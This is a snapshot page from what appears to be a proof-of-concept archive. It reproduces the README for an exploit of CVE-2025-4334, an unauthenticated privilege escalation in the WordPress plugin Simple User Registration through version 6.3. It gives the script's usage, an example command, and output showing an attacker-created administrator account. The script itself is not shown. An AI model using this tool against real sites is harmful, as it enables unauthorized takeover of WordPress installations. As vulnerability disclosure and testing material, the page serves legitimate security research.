Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4334 PoC — WordPress plugin Simple User Registration 安全漏洞

Source
https://github.com/Nxploited/CVE-2025-4334
Associated Vulnerability
Title:WordPress plugin Simple User Registration 安全漏洞 (CVE-2025-4334)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Simple User Registration 6.3及之前版本存在安全漏洞,该漏洞源于用户元值限制不足,可能导致权限提升。
Description
Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
Readme
# 🔓 Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation

## 📄 Description

The **Simple User Registration** plugin for WordPress is vulnerable to **Privilege Escalation** in all versions up to, and including, **6.3**.  
This is due to insufficient restrictions on user meta values that can be supplied during registration.  
This makes it possible for **unauthenticated attackers** to register as an **administrator**.

---

## 🛡️ Vulnerability Details

- **Type**: Improper Privilege Management  
- **CVE**: CVE-2025-4334  
- **CVSS Score**: 9.8 (Critical)  
- **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`  
- **Publicly Published**: June 25, 2025  
- **Last Updated**: June 26, 2025  

---

## 🛠️ Exploit Script

The exploit automates privilege escalation via form submission using extracted nonce, form ID, and referer.

### ⚙️ Usage

```bash
python CVE-2025-4334.py -h
```

```
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form
```

---

## 🌐 URL Explanation

- `-u` → Base WordPress installation (e.g. `http://localhost/wordpress/`)  
- `--form` → Full URL to the vulnerable registration form (e.g. `http://localhost/wpr/default-registration/`)

---

## 🧪 Example

```bash
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
```

#### ✅ Result

```
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : test@admin.ksa
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)
```

---

## ⚠️ Disclaimer

This script is provided for **educational and research purposes only**.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

*By: Khaled_alenazi (Nxploited)*
File Snapshot

 [4.0K]  /data/pocs/0a4e331b978b5d25eefe8da05082a3f0d4bebfcc
├── [3.4K]  CVE-2025-4334.py
├── [1.1K]  LICENSE
├── [2.4K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.